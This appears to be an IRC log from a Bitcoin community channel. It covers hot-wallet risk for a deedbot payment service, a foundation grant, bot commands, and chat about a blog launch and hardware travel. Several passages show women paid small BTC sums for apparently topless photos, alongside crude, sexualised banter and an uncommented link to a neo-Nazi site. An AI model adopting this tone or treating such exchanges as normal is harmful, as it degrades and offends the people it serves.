fee. will decide what that is later 1798744;1523667425;trinque;if I'm moving this from a "hey use my airgap system for cheap" to "high throughput wallet system" it's going to pay for itself 1798745;1523667460;mircea_popescu;trinque charge whatever the network fee is and there you go. 1798746;1523667686;trinque;still doesn't really pay for me cutting txn; obviously the ideal is I cut txn to refill a hot wallet, bot can use up to hot wallet balance without operator interaction. 1798747;1523667701;trinque;since I am unwilling to bail the thing out if the hotwallet piggy is popped, I have been reluctant to do that. 1798748;1523667703;mircea_popescu;at this phase the incentive should still principally be to streamline things. 1798749;1523667724;trinque;douchebag: asking you to review trb's deps wasn't idly selected 1798750;1523667729;mircea_popescu;trinque how much does it need to be ? so far < 1 btc per day or so neh ? 1798751;1523667760;trinque;yeah, but I'm not extending people trb+linux+amd64 insurance 1798752;1523667796;mircea_popescu;what do you evaluate the odds of it getting popped at ? 1798753;1523667837;mircea_popescu;~ example of question to be answered correctly above ~ 1798754;1523667897;trinque;really depends on whether it's a political or economic reason for attack. 1798755;1523667936;trinque;sub BTC piggy isn't worth that much, but "lul popped republican wallet operator" is 1798756;1523667965;mircea_popescu;i... guess. 1798757;1523668007;mircea_popescu;contrariwise though, there's not that much per-tx cost the system can bear. 1798758;1523668050;mircea_popescu;i can't imagine half dozen tx/day sorta debit can in any meaningful sense "pay for itself". 1798759;1523668083;mircea_popescu;(consider that these are uncharacteristically generious txn, most of the world still operates on the 19.95 walmart standard.) 1798760;1523668154;trinque;txn fees on my recent ones have been something like 0.00001, at the low end 1798761;1523668190;mircea_popescu;that's pretty good. 1798762;1523668229;mircea_popescu;kinda how my reasoning went, "he's pretty good at getting tx fees optimized, chances are users won't even notice they're paying, when comparing with $average-webservice." 1798763;1523668441;*;trinque checks date. 1798764;1523668456;mircea_popescu;it's friday, april 13th 1798765;1523668463;trinque;you know the hard drive on the box cutting txn died too, this week? 1798766;1523668466;trinque;dundundun 1798767;1523668478;mircea_popescu;lol. 1798768;1523668564;mircea_popescu;trinque anyway, one reasonable measure to cost control is to do all txn once a day, every day. ish. 1798769;1523668579;mircea_popescu;that way a) you get automated txn bundling, reducing fees and b) you don't have to keep doing it. 1798770;1523668649;trinque;that's about what I've been doing 1798771;1523668659;mircea_popescu;you ~could~ add a deedbot command like !!pending which'd list all pending items and the estimated next send ("Next tx push on Fri, Apr 14 at 8:14 pm -- in 25hours). gives people something to do with their time. 1798772;1523668666;trinque;isn't always going to be the case that I'm next to the machine at the same time 1798773;1523668692;mircea_popescu;you just update a field with "next tx". 1798774;1523668695;trinque;but sure, thing could say "estimated dispatch $time" 1798775;1523668696;trinque;yep 1798776;1523668705;mircea_popescu;generally should be able to guess at the time you'd do it today what time'd be convenient tomorrow sorta deal 1798777;1523668798;mircea_popescu;but, to be plain, it is a lot of work, and very useful, and very finnicky / highly qualified / high responsibility. so absolutely you should make bank for doing it. 1798778;1523668826;mircea_popescu;problem with it is that such a thing only pays after getting large enough. 1798779;1523668836;trinque;very true. 1798780;1523668860;trinque;I'd actually like to find a path to the hot wallet sooner than later, for reasons of getting large enough 1798781;1523668878;mircea_popescu;kinda the dilemma of "democratic society" aka "people have rights / are best judges of how to deploy their own resources" etc. you end up with the walmart world and either you chase the britney spears fanbase or else can't cover costs. 1798782;1523668881;trinque;probably just going to set a ceiling on it, and grow the ceiling over time 1798783;1523668897;trinque;let whatever comes in as revenue trickle over into a rainy day fund if a wallet gets popped 1798784;1523668920;mircea_popescu;trinque the line i was going on with the "what odds do you give" is that CDB is indelible from the book, stays there in red. cost of carry of capital, goods or otherwise, and so on. 1798785;1523668970;mircea_popescu;you're stuck investing $hotwallet-size * $failure-odds into the business that it could be, like it or not. just like your time. 1798786;1523669034;mircea_popescu;now, i am in the fortunate position of having valuable experience : bitbet's hotwallet was 1btc ; and it was never popped. 1798787;1523669057;mircea_popescu;(1 btc worth, it was actually 10, but they came to about 5-10k or such) 1798788;1523669063;trinque;that's good to know. 1798789;1523669090;mircea_popescu;now, kako for all his weird was certainly technically competent, so it's not the case that "there lay a trb in the rain". 1798790;1523669101;mircea_popescu;but i don't judge you all that dizzy, either. 1798791;1523669104;douchebag;trinque: In regards to trb deps 1798792;1523669112;douchebag;I'm definitely going to look into them 1798793;1523669127;douchebag;and I have some friends really big into RE who are going to be helping 1798794;1523669151;trinque;mircea_popescu: just trying to frontload the decisions so I'm not on my ear when somethign raises its head. 1798795;1523669154;douchebag;one is ex-military and worked on reverse engineering enemy weapons ect... 1798796;1523669163;mircea_popescu;trinque quite sensible. 1798797;1523669177;trinque;I've handled orders of magnitude more bezzlebucks elsewhere and yet this obviously, I care a great deal more about. 1798798;1523669188;trinque;never bitten on either side, but want it kept that way 1798799;1523669199;trinque;also there's the radiation damage of the former screaming never again while working on the latter 1798800;1523669202;douchebag;I just want to have a dedicated box to review these on, and as mircea_popescu mentioned I'll be sent a server 1798801;1523669210;douchebag;to install this stuff on 1798802;1523669215;trinque;I think you are right, and I'll just consider this an investment in the thing's growth 1798803;1523669225;mircea_popescu;trinque you might be overdramatizing ; what, you think i've never lost a team ? what am i, made of pure energy ? shit happens ; gotta have plans in place and move on. 1798804;1523669240;mircea_popescu;douchebag you're getting it, you're getting it. 1798805;1523669390;trinque;alright douchebag, your flood of titties made me agree to a hotwallet 1798806;1523669405;mircea_popescu;truth be told it was mostly ckeen 1798807;1523669411;mircea_popescu;what happened to him lol! 1798808;1523669414;trinque;ah yeah, was wasn't it 1798809;1523669423;trinque;at any rate I approve of this engineering process 1798810;1523669480;mircea_popescu;douchebag are you actually doing skag btw ? 1798811;1523669490;*;trinque will be back in about an hour, perhaps the idiot ISP will be back by then. 1798812;1523669710;mircea_popescu;another obvious angle here being, hey ben_vulpes mod6, considering the very useful and important work trinque's doing, imo best illustrated by http://btcbase.org/log/2018-04-12#1797663 is there any chance he'd get a one time grant from tbf ? 1798813;1523669710;a111;Logged on 2018-04-12 18:58 mircea_popescu: avgjoe it's exactly equivalent to "segwit" except much less expensive. 1798814;1523669747;ben_vulpes;for teh cbd? 1798815;1523669770;ben_vulpes;cdb* 1798816;1523669918;mod6;I'd be happy to hear proposls, indeed! 1798817;1523670065;mod6;Speaking of which, ben_vulpes, let me know what you think, but to help keep track of these grants, I think the applicants for a Foundation grant, should write up a small document outlining: 1) How much they are requesting, 2) What the intended purpose is for the grant, 3) The Duration (if any, i.e. one year, or one-time, etc), 4) The current block height / date. 5) Signed with WoT Key. 1798818;1523670097;mod6;Upon approval these can be deeded so we can keep track. I'm starting to have a hard time remembering them all! 1798819;1523670100;mod6;:D 1798820;1523670118;mircea_popescu;well, the idea is that indeed he's on the hook, for a particular type of cost. obviously writing code, reviewing code, testing things, design, graphic or systems, all sorts of things are useful and valuable, and they take people's time. if you spend an hour reading through patches you can't spend that hour petting your dog/kitten/kid whatever. 1798821;1523670139;mircea_popescu;nevertheless, you know aforehand, when you sit down to read through a patch, that you're gonna spend so long with it, and you'll stop when you stop. 1798822;1523670153;mircea_popescu;whereas this, it's more a case of carrying a knife up your ass. it decides when and what. 1798823;1523670225;mircea_popescu;i dunno if i'm making any sense. am i ? 1798824;1523670243;mod6;I view his work on deedbot & wallet as highly-necessary and critical. So you kinda read my mind when you asked us above. 1798825;1523670280;mircea_popescu;specifically being able to say, "oh, yeah, segwit, whatever, the power ranger's version of deedbot's !!pay, right ?" is a tmsr-wide benefit. 1798826;1523670298;mod6;You're totally making sense. It could be a reoccuring grant; needs to be re-newed yearly (or some interval). I'm not in the best position to have an idea as to what is a sensible amount for the interval. 1798827;1523670343;mircea_popescu;i'm guessing if it covers his original hotwallet it's all roses. 1798828;1523670363;mircea_popescu;if he doesn't get popped, it needs no renewal, it's permanent. and if he does... well... 1798829;1523670437;mod6;My initial thought was that the Foundation would say, offer a one time engineering fee of 1 BTC. And then also provide insurance for the hot wallet to the tune of say, 1 BTC. 1798830;1523670481;mod6;Maybe that's not as reasonable as what you're suggesting though -- a reoccuring grant. 1798831;1523670501;mircea_popescu;just give him a bitcoin to seed his hotwallet, and call it a day. 1798832;1523670538;mod6;I'd be fine with that. I'd even go a bit further and throw in some extra funding for the development, historical and forward. 1798833;1523670542;mircea_popescu;if he manages to lose it we can have words about maybe another one ; but it'd better not be this year. 1798834;1523670602;mircea_popescu;mod6 you can't afford to pay for development. i appreciate the sentiment, and i'm not saying his work is negligible, but if you count all the IMMENSE amount of devwork the republic has produced, however you add it up you'll either a) be on the hook for more than the foundation has, significantly more, or else b) you'll be stuck taking lowball to the level of insulting people. 1798835;1523670605;mircea_popescu;neither's a good outcome. 1798836;1523670649;mod6;Aha, was thinking that part was a one time thing, The Foundation would indeed run out of money in short order. 1798837;1523670667;mod6;Anyway, ok. I'm happy to approve seeding the hot-wallet. 1798838;1523670671;mod6;ben_vulpes: Thoughts? 1798839;1523670886;ben_vulpes;1 btc sounds like it would insure the hotwallet for quite some time, sounds neat but let me think about it 1798840;1523670936;mod6;Cool. 1798841;1523671189;ben_vulpes;trinque: rang, asked me to pass on that a) he doesn't need help insuring the hotwallet, and that b) he's thinking really hard about how much of linux and the rest of the stack to insure on his own back, and the moral hazard of doing so 1798842;1523671206;ben_vulpes;(look gossipd works, asciilifeform can take a nap) 1798843;1523671361;ben_vulpes;thoughts topmost on my stack (after apache arcana) are about the implications of the foundation backing the 'tbtf' initiatives. i know that someone must, but going from a rate of zero in however many years to two in two quarters is worth pausing and thinking for. 1798844;1523671679;mod6;Not as much ``tbtf initiatives'' as it is just the larger Republic, neh? 1798845;1523671701;mod6;Anyway, can think on it. 1798846;1523671708;ben_vulpes;'too big to fail' i mean 1798847;1523671719;mod6;Oh, i see. 1798848;1523671760;ben_vulpes;i want to read what trinque has to say as well 1798849;1523671779;mod6;No worries, no rush. 1798850;1523672013;trinque;mircea_popescu: wallet is back online 1798851;1523672165;trinque;ben_vulpes: that's an accurate rendering of my opinion. I think mircea_popescu was correct in that there's an unavoidable cost of doing business of a startup wallet service. 1798852;1523672233;trinque;element of this http://btcbase.org/log/2017-07-19#1686516 every time one thinks about running a serious service on the modern shitpile 1798853;1523672233;a111;Logged on 2017-07-19 01:32 mircea_popescu: http://btcbase.org/log/2017-07-19#1686438 <<< yes, because you're applying the pretense of statics to a dynamic situation. trinque 's metaphore is very much factual : we were paradopped on hot coals, by the FAULT, inexcusable, and indelible, of our parents. they should have taken care that we do not get dropped on hot coals, as children barely able to move. they did not, and derelict in their first and practically speaking on 1798854;1523672415;trinque;I think a 1BTC ceiling would be a satisfactory tolerance for loss from the hot wallet, which I would be able to eat. which is not a promise to eat the thing's losses endlessly either, but on the airgap-wallet side I have enough confidence in the setup that my tolerance is higher. 1798855;1523672818;mod6;I'm fine with this if you are. Certainly wern't trying to force anything on you by any means. 1798856;1523673139;trinque;naw, it's a compliment that you'd consider doing that. 1798857;1523673167;mod6;o7 1798858;1523673813;trinque;http://btcbase.org/log/2018-04-14#1798822 << I lol'd 1798859;1523673813;a111;Logged on 2018-04-14 01:42 mircea_popescu: whereas this, it's more a case of carrying a knife up your ass. it decides when and what. 1798860;1523674045;mircea_popescu;ben_vulpes the reasoning wasn't tbtf, but rather community-benefit terrible-cost-structure 1798861;1523674192;mircea_popescu;trinque that works also, keeps things cleaner in a sense. 1798862;1523674207;mircea_popescu;now whom didn't i pay here 1798863;1523674219;mircea_popescu;!!pay jossi 0.02 1798864;1523674222;mircea_popescu;!!up jossi 1798865;1523674224;deedbot;jossi voiced for 30 minutes. 1798866;1523674227;deedbot;Get your OTP: http://p.bvulpes.com/pastes/VVCEG/?raw=true 1798867;1523674279;mircea_popescu;ben_vulpes moreover, tbf involvement with pizarro was an investment, not a grant. it got equity didn't it. 1798868;1523674776;mircea_popescu;or is this your discreet way of proposing pizarro's bust :D 1798869;1523676375;douchebag;yo mp 1798870;1523676377;douchebag;you on? 1798871;1523676400;douchebag;mircea_popescu 1798872;1523676902;mircea_popescu;yeah. 1798873;1523678092;ben_vulpes;wp-login.php?redirect_to=http%3A%2F%2Fpizarro.danielpbarron.com%2Fwp-admin%2Findex.php << hue, nono 1798874;1523678138;douchebag;okay 1798875;1523678145;douchebag;ill get her setup rn 1798876;1523678164;ben_vulpes;pff 1798877;1523678175;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-14#334157 << was the link i meant to paste 1798878;1523678177;mimisbrunnr;Logged on 2018-04-14 02:49 mircea_popescu: or is this your discreet way of proposing pizarro's bust :D 1798879;1523678190;mircea_popescu;aok 1798880;1523678211;mircea_popescu;gotta watch what you say, teh investors are eager to misinterpret! 1798881;1523678239;ben_vulpes;who isn't isweatergod 1798882;1523678303;trinque;douchebag: how many you got, and I'll crack this megawad off before bed 1798883;1523678410;douchebag;The one I'm getting right now will be my last one for the night 1798884;1523678420;douchebag;i need to go to bed after this too 1798885;1523678562;douchebag;!!up freezie 1798886;1523678563;deedbot;freezie voiced for 30 minutes. 1798887;1523678589;freezie;i have breasts 1798888;1523678592;trinque;ahaha 1798889;1523678600;mircea_popescu;lol 1798890;1523678618;mircea_popescu;freezie 3b9958e8 ; you have half your. 1798891;1523678621;mircea_popescu;half hour* 1798892;1523678626;trinque;ohey mircea_popescu, pls to gpg an ssh pubkey 1798893;1523678633;mircea_popescu;trinque 1sec 1798894;1523678651;freezie;douchbag is helping me with that now 1798895;1523678907;mircea_popescu;trinque http://p.bvulpes.com/pastes/URMxE/?raw=true 1798896;1523678947;freezie;!!register http://p.bvulpes.com/pastes/Hj4el/?raw=true 1798897;1523678951;deedbot;5557D3189D3158F7F87CB1988933AF972C7A7AFD registered as freezie. 1798898;1523678965;mircea_popescu;ben_vulpes incidentally, did p.bvulpes cross the mn mark yet ? 1798899;1523678975;ben_vulpes;i dun count 1798900;1523678984;mircea_popescu;oh. right. 1798901;1523679259;deedbot;http://pizarro.danielpbarron.com/2018/hello-world/ << Daniel P. Barron - Henlo world! 1798902;1523679260;deedbot;http://pizarro.danielpbarron.com/2018/test-post/ << Daniel P. Barron - Test Post 1798903;1523679260;deedbot;http://pizarro.danielpbarron.com/2018/yet-another-test/ << Daniel P. Barron - Yet another test 1798904;1523679261;deedbot;http://pizarro.danielpbarron.com/2018/oklahoma/ << Daniel P. Barron - Oklahoma 1798905;1523679261;deedbot;http://pizarro.danielpbarron.com/2018/banned-from-bill%e2%80%99s-seafood/ << Daniel P. Barron - Banned from Bills Seafood 1798906;1523679261;deedbot;http://pizarro.danielpbarron.com/2018/banned-from-the-westbrook-elk%e2%80%99s-club/ << Daniel P. Barron - Banned from the Westbrook Elks Club 1798907;1523679262;deedbot;http://pizarro.danielpbarron.com/2018/banned-from-the-rabbit-hole/ << Daniel P. Barron - Banned from The Rabbit Hole 1798908;1523679263;deedbot;http://pizarro.danielpbarron.com/2018/do-not-build-yourself-perishable-treasures/ << Daniel P. Barron - do not build yourself perishable treasures 1798909;1523679263;deedbot;http://pizarro.danielpbarron.com/2018/do-you-live-a-christian-lifestyle/ << Daniel P. Barron - Do you live a Christian lifestyle? 1798910;1523679284;danielpbarron;lol, guess that's working 1798911;1523679285;trinque;lol, k. I guess he changed his WP settings for hostname 1798912;1523679289;trinque;ohai danielpbarron 1798913;1523679389;mircea_popescu;and in forgotten gems, http://trilema.com/2014/ken-park/ 1798914;1523679464;mircea_popescu;http://thewhet.net/2018/04/mp-wp-genesis/ << interestingly enough, this still doesn't. what's the danielpbarron hanbot difference i wonder. 1798915;1523679504;ben_vulpes;hanbot has something in her .htaccess i haven't worked with her to unsnsarl yet 1798916;1523679536;trinque;mircea_popescu: http://p.bvulpes.com/pastes/rRVZp/?raw=true 1798917;1523679612;mircea_popescu;cool deal. 1798918;1523679773;mircea_popescu;trinque http://p.bvulpes.com/pastes/GmR42/?raw=true 1798919;1523680040;mircea_popescu;omfg danielpbarron plox change your favicon 1798920;1523680216;trinque;mircea_popescu: http://p.bvulpes.com/pastes/whmE2/?raw=true 1798921;1523680239;mircea_popescu;"A couple weeks later, I get accosted by some drunk chick who heard from a friend that I “think women shouldn’t be allowed to speak.” She argued with me alongside one of her friends — that is, I argued some perfectly valid points, while she got increasingly beligerant; much to the friend’s dismay, who even expressed that I was coming off as the victUAL". jeez this guy's saturday nights! 1798922;1523680242;mircea_popescu;(some portions altered) 1798923;1523680270;freezie;alright https://i.imgur.com/ArL08eO.jpg 1798924;1523680341;douchebag;nice, with three minutes to spare 1798925;1523680344;douchebag;good job 1798926;1523680364;mircea_popescu;!!pay freezie 0.02 1798927;1523680369;deedbot;Get your OTP: http://p.bvulpes.com/pastes/DLz3Q/?raw=true 1798928;1523680370;mircea_popescu;lol 1798929;1523680373;mircea_popescu;!!up freezie 1798930;1523680374;deedbot;freezie voiced for 30 minutes. 1798931;1523680389;freezie;w000000ie 1798932;1523680412;douchebag;hey trinque 1798933;1523680414;douchebag;I 1798934;1523680442;douchebag;ill let you know when her shit is all processed 1798935;1523680468;douchebag;and then you can process them 1798936;1523680473;trinque;I'll know. The thermal printer lets out a screeeeeeee 1798937;1523680479;trinque;but appreciated 1798938;1523680485;douchebag;<3 1798939;1523680578;douchebag;thats a really secure setup it sounds like 1798940;1523680593;mircea_popescu;unless a cat lives nearby 1798941;1523680599;douchebag;haha 1798942;1523680601;mircea_popescu;cats really dun like unattended printers. 1798943;1523680629;mircea_popescu;it doesn't even get that bad until it tries to pee on it. 1798944;1523680683;douchebag;lmfao 1798945;1523680729;douchebag;alright trinque she's all good 1798946;1523680745;trinque;myeah withdrawal slips have definitely been cat-diddled along the way 1798947;1523680889;mircea_popescu;danielpbarron it occurs to me you should prolly wear your scandalous shirt in your header or something. 1798948;1523681090;mircea_popescu;also, you should probably come do karaoke here. for one thing, there's hookers. for the other thing, they're so enamoured with the idea of english they'll like it whatever it is (not that they'd know). and soo n. 1798949;1523681222;danielpbarron;heh, so the dns is working ok on your end? 1798950;1523681338;mircea_popescu;on mine ? yes. 1798951;1523681350;mircea_popescu;o wow, so you were going to brazil and then ended up living with the true church folk ? i had nfi! 1798952;1523681455;danielpbarron;yeah i got my visa and everything 1798953;1523681554;mircea_popescu;hm. i can't help but read this passage as "on my way i got waylaid by these fellows who saw i had dough and well..." ; but then again i'm a cynical sort. 1798954;1523681823;trinque;I hope this "banned from" thing has more episodes 1798955;1523681918;danielpbarron;heh 1798956;1523681987;mircea_popescu; Post from danielpbarron: Henlo world! << henlo world lol 1798957;1523682456;mircea_popescu;"Darwin also went to The Master's College library and checked out a stack of MacArthur's books about 18 inches high. Normally, they would not allow so many volumes to be lent out all at one time, but in this case, for some reason, they made an exception." << "they were secretly hoping he steals them" 1798958;1523682665;mircea_popescu;http://atruechurch.info/ourside.html this stuff's pretty entertaining altogether. 1798959;1523682730;mircea_popescu;almost like larping, "one magic spell they used was..." 1798960;1523683994;mircea_popescu;o wow, AND there's a libel countersite too! http://www.atruecult.com/dfishfaq.htm 1798961;1523684041;mircea_popescu;danielpbarron so what's the dirt, what happened between the david fish fellow and the al soto fellow ? 1798962;1523684460;mircea_popescu;!!up redfawnn 1798963;1523684461;deedbot;redfawnn voiced for 30 minutes. 1798964;1523684468;redfawnn;boobs 1798965;1523684469;redfawnn;:) 1798966;1523684472;mircea_popescu;lol 1798967;1523684482;mircea_popescu;ddc1ae60 ; half hour. 1798968;1523684883;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-14#334077 << what sorta teams are these? 1798969;1523684884;mimisbrunnr;Logged on 2018-04-14 01:17 mircea_popescu: trinque you might be overdramatizing ; what, you think i've never lost a team ? what am i, made of pure energy ? shit happens ; gotta have plans in place and move on. 1798970;1523684897;mircea_popescu;you know, like you. 1798971;1523685001;ben_vulpes;ah 1798972;1523685031;mircea_popescu;" ben_vulpes took a dozen hookers and a truck of beer to the nevada desert and was never heard from again " 1798973;1523685343;ben_vulpes;valhallah! 1798974;1523685372;ben_vulpes;ah, stray h. /me bbl 1798975;1523686036;trinque;ben_vulpes: hey I just had a vacation idea 1798976;1523686227;redfawnn;hey trying to upload picture now 1798977;1523686240;redfawnn;getting a timeout 1798978;1523686341;mircea_popescu;trinque going to chiraq to sample thatbitchlola 's wares ? 1798979;1523686405;mircea_popescu;!!up redfawnn 1798980;1523686406;deedbot;redfawnn voiced for 30 minutes. 1798981;1523686408;redfawnn;https://usercontent.irccloud-cdn.com/file/u5Oo2xt4/image.jpg 1798982;1523686422;mircea_popescu;!!key redfawnn 1798983;1523686424;deedbot;http://wot.deedbot.org/0C1BA41E9B9C0FC8EAAE6869157A3839B0D23572.asc 1798984;1523686429;mircea_popescu;!!pay redfawnn 0.02 1798985;1523686432;redfawnn;I tried to reverse on phone but couldnt figure out 1798986;1523686441;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Lp4QH/?raw=true 1798987;1523686449;mircea_popescu;what do you mean reverse ? 1798988;1523686481;redfawnn;Its mirrored 1798989;1523686527;redfawnn;phone flipped it somehow 1798990;1523686533;mircea_popescu;oh i see. 1798991;1523686537;mircea_popescu;!!pay trinque 0.03 1798992;1523686541;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ssiLr/?raw=true 1798993;1523686551;mircea_popescu;i have nfi how he managed it, but apparently his early cuntoo actually works for practical purposes. 1798994;1523686568;redfawnn;cuntoo? lol 1798995;1523686655;mircea_popescu;yes. 1798996;1523686667;mircea_popescu;it's like gentoo for manly men. 1798997;1523686705;redfawnn;cunt is an odd word, it just sounds disgusting, much prettier terms for it 1798998;1523686714;mircea_popescu;i disagree. 1798999;1523686761;redfawnn;whats the worst you have? term wise for it 1799000;1523686777;mircea_popescu;i dunno, "weewee" ? 1799001;1523686800;redfawnn;fuck gutter, probably the worst I heard 1799002;1523686857;mircea_popescu;that's rather... maladroit. 1799003;1523687004;redfawnn;you must have a term similar 1799004;1523687020;mircea_popescu;notrly. 1799005;1523687688;lobbes;it's titphoon season >> http://btcbase.org/log/2018-04-13#1798188 1799006;1523687688;a111;Logged on 2018-04-13 16:42 shinohai: it's raining tits of late. April showers and all i suppose 1799007;1523687691;lobbes;and with that I have exceeded my horrible pun quota for 2018 1799008;1523687729;mircea_popescu;there is no quota on pun, it is all lie and spin. 1799009;1523689669;lobbes;damn. meta-pun. try as I might I cannot follow 1799010;1523689677;mircea_popescu;spun. 1799011;1523689689;lobbes;ha! 1799012;1523689695;mircea_popescu;i am the motherfucking bad pun ~CHAMPION~. 1799013;1523689699;lobbes;you pull no punches 1799014;1523689818;mircea_popescu;that's because i was born with a silver spoon. 1799015;1523690036;lobbes;well, stick a fork in me, I'm done 1799016;1523690053;*;mircea_popescu gloats with impunity. 1799017;1523692596;ckang;hey all 1799018;1523699350;spyked;http://btcbase.org/log/2018-04-13#1798160 <-- I can definitely see this angle. my point is that by giving up the "general-purpose" pretense altogether, the system designer can qualitatively reduce the implicit trust in code running in the system. so yes, http://btcbase.org/log/2018-04-13#1798161 but moreover, one would not expect to find e.g. a pdf processing library in bitcoin node os, as "bitcoin node" can be specced all the way from 1799019;1523699350;a111;Logged on 2018-04-13 16:20 mircea_popescu: now then, a "general purpose operating system" is "that set of code which is trusted implicitly", "as long as it makes no particular assumptions about the rest of the code that will run on the machine". 1799020;1523699350;a111;Logged on 2018-04-13 16:21 mircea_popescu: the moment we bake in the assumption that "this is a bitcoin node", suddenly the os is no longer gp ; we'll want a special fs in there etc. 1799021;1523699357;spyked;user interface, through the os and down to hardware components. which brings us back to the way engineering was done in the olden days, before that weed overdose, i.e. http://archive.is/TRrOE 1799022;1523699458;spyked;every time OS insists on pulling in "udev" or "tls" or whatever other packages (tons of examples in the logs), it's because someone wanted to add more "general-purpose" scaffolding. 1799023;1523700380;spyked;http://btcbase.org/log/2018-04-13#1798435 <-- not sure it's my place to comment on this, but it sounds a lot like the "academic grant" trap that I've fallen into at some point. consider this: the abstraction of money exists so that humans can attribute economic value to things. on the other side of the problem, "creating valuable things for humanity" or for "no concrete labour obligations" are not economically quantifiable (any value, 1799024;1523700380;a111;Logged on 2018-04-13 20:22 zx2c4: the reason is actually, "so that i can have a fixed income without any concrete labor obligations" 1799025;1523700386;spyked;including zero, can pay "no concrete labour obligations", neh?). this is why academic grants and giving away \infty btc like that is such a waste and http://btcbase.org/log/2018-04-13#1798420 . and this is also why "get into business", because it puts your skin in the game and forces you to determine the value of whatever you're selling. 1799026;1523700386;a111;Logged on 2018-04-13 20:16 mircea_popescu: zx2c4 you'd be terribly worse off, and so would be the bitcoin ecosystem. 1799027;1523700517;spyked;and just to be clear re "economic value": the whole system of academic grants is based upon the lie that "there are enough resources to satisfy everyone". well, there aren't, tough luck. which reduces grant proposals to a very sophisticated way of begging, i.e. https://www.youtube.com/watch?v=0vVpsJnbq3A 1799028;1523700688;*;spyked should translate ^ at some point 1799029;1523700817;spyked;but in short, "stretched hand that doesn't tell a story doesn't get dole" 1799030;1523706492;*;ascii_lander reporting from BingoBoingostan !! 1799031;1523706602;ascii_lander;here also with me is ~100kg of iron ( some of which admittedly is old rags, foam, etc ) 1799032;1523706687;ascii_lander;iron pawed over by many hands, but in the end unmolested. 1799033;1523706717;ascii_lander;funnily enuff it was the rockchips that caused the greatest wtf , 'wassis', 'looks expensive' 1799034;1523706748;ascii_lander;even the americans, on letting ~out~, which is imho hilarious 1799035;1523706795;ascii_lander;i'ma take a nap nao and so bbl. 1799036;1523707540;diana_coman;congrats ascii_lander 1799037;1523707623;diana_coman;do the US tax stuff going *out* now? or why puzzle over it / looks expensive thing? 1799038;1523713422;BingoBoingo;ascii_lander: Let me know when you wake and where you want to meet 1799039;1523713980;diana_coman;http://btcbase.org/log/2018-04-02#1791957 <- feel free to invoice me with deedbot so it doesn't wait on meeting in game (unless you prefer ECu, ofc) 1799040;1523713980;a111;Logged on 2018-04-02 01:57 lobbes: ^^ q1 auction bot billz (slow quarter!). Mainly for accounting purposes; no rush on collecting due to eulora servers being down and the fact that the sums are a mere 96 satoshi each 1799041;1523714281;diana_coman;!!v 4DA979ADFADDB09A5CA0492D77E241BB381A5234434C9D78918553E0E98B0004 1799042;1523714281;deedbot;diana_coman rated trinque 3 << I trust him with my BTC (deedbot); writes at http://trinque.org/ 1799043;1523714594;deedbot;http://qntra.net/2018/04/russian-air-defense-hardware-getting-pretty-good-at-intercepting-us-missiles/ << Qntra - Russian Air Defense Hardware Getting Pretty Good At Intercepting US Missiles 1799044;1523714757;diana_coman;!!v 0A73690804DC4E46165F1ECFE39CD7E06805A43AF32E3391EA886CB69416AB30 1799045;1523714757;deedbot;diana_coman rated spyked 2 << former Fain contributor, known him online for years; writes at http://thetarpit.org/ 1799046;1523716354;BingoBoingo;!!up aloevera 1799047;1523716355;deedbot;aloevera voiced for 30 minutes. 1799048;1523716370;BingoBoingo;aloevera: Who is your daddy and what does he do? 1799049;1523716392;aloevera;im a bastard 1799050;1523716408;aloevera;!!register https://pastebin.com/PVQi79HE 1799051;1523716410;deedbot;Import failed for https://pastebin.com/PVQi79HE. 1799052;1523716437;BingoBoingo;Try using http://p.bvulpes.com/ 1799053;1523716497;aloevera;!!register http://p.bvulpes.com/pastes/n6OIm/?raw=true 1799054;1523716503;deedbot;D2D2EC9B2DB9EAED4F81320F64F9BD34B66ADF9C registered as aloevera. 1799055;1523717498;danielpbarron;http://btcbase.org/log/2018-04-14#1798961 << soto was kicked out over covetousness 1799056;1523717498;a111;Logged on 2018-04-14 05:34 mircea_popescu: danielpbarron so what's the dirt, what happened between the david fish fellow and the al soto fellow ? 1799057;1523723743;ascii_lander;http://btcbase.org/log/2018-04-14#1799037 << lol nope, it was the 'tsa' monkey, 'this looked quite exciting on xray' 1799058;1523723743;a111;Logged on 2018-04-14 12:07 diana_coman: do the US tax stuff going *out* now? or why puzzle over it / looks expensive thing? 1799059;1523723892;ascii_lander;http://btcbase.org/log/2018-04-14#1799038 << still waking up 1799060;1523723892;a111;Logged on 2018-04-14 13:43 BingoBoingo: ascii_lander: Let me know when you wake and where you want to meet 1799061;1523724418;BingoBoingo;ascii_lander: Aite, how is the view? 1799062;1523724424;ascii_lander;BingoBoingo: pretty neat. 1799063;1523724450;BingoBoingo;Got one of the river or the endless short buildings 1799064;1523724473;ascii_lander;the latter. and streets, complete with sov-style sweepers 1799065;1523724509;BingoBoingo;AHA, Saturday is sweeping day 1799066;1523724552;ascii_lander;i'ma wash up & dress etc, bbl at the console in ~halfhr. meanwhile BingoBoingo think of where they have ice cream around here. 1799067;1523724590;BingoBoingo;Quite a few places, depends on where "here" is for you 1799068;1523724604;ascii_lander;hotel-ben_vulpes 1799069;1523724614;*;ascii_lander brb 1799070;1523724615;BingoBoingo;Ah 1799071;1523724728;mod6;:] 1799072;1523724873;BingoBoingo;ascii_lander: You have two locations of la heladeria la cigale near you. Roque Grassas 845 is nominally closer, but Juan Benito Blanco esq Miguel Barrio is a straight shot from where you are at. 1799073;1523724926;BingoBoingo;Or if you wait to get to the datacenter there's a few different ones here in the BingoBoingo part of town. 1799074;1523725059;BingoBoingo;In MVD shopping there is yet another La Cigale, Freddo's and the grocery store Tienda Inglesa if you prefer your ice cream in volume. 1799075;1523725105;BingoBoingo;Actually the closest place for icecream to you is on the same block. Walk around the corner to the gas station. 1799076;1523725182;BingoBoingo;La Administración Nacional de Combustibles, Alcohol y Portland tends to stock rather decent food products in their outlets 1799077;1523725661;ben_vulpes;alcohol y portland lol 1799078;1523725932;BingoBoingo;You know, the cement 1799079;1523726113;BingoBoingo;https://dailystormer.name/russian-trolls-are-friggin-everywhere/ 1799080;1523727777;ascii_lander;back 1799081;1523727867;*;ascii_lander inspected cargo : not only were $boxen thoroughly pawed over ( external trunk seals popped, inside -- careful packing turned into a ??? shambles) but some 'ears' bent 1799082;1523727889;ascii_lander;internal seals appear intact tho. 1799083;1523727926;BingoBoingo;That sounds about par for the course 1799084;1523727959;ascii_lander;item of greatest concern is a bent topcover latching thumb-bolt, we will not be able to work on that box until it is straightened 